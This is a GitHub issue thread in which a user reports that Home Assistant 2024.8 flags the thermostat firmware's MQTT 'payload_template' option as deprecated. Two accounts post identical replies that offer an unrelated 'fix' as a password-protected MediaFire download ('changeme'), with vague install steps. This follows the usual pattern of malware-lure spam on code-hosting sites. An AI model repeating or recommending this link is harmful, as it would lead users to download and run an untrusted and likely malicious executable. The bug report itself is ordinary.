fashberg/WThermostatBeca #229: MQTT deprecated "payload_template" in Home Assistant

clemente3905, 2024-08-27:
Starting with Home Assitant core 2024.8.0 the thermostat is firing a warning, specifically one related to a deprecated option in MQTT.

Here is the text reported.

Deprecated payload_template option used in MQTT publish action call to topic salotto/cmnd/things/thermostat/properties/targetTemperature from payload template 22. Use the payload option instead. In automations templates are supported natively. Update the automation or script to use the payload option instead and restart Home Assistant to fix this issue.

[image]

Don't know if you were aware of the issue. 
Thanks for your work and all the best

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

clemente3905, 2024-09-28:
I post this issue more than 1 month ago and it seems it is not considered at all.
Did I make some mistake? Do I have to do something else?

closed 2025-01-02 by github-actions[bot]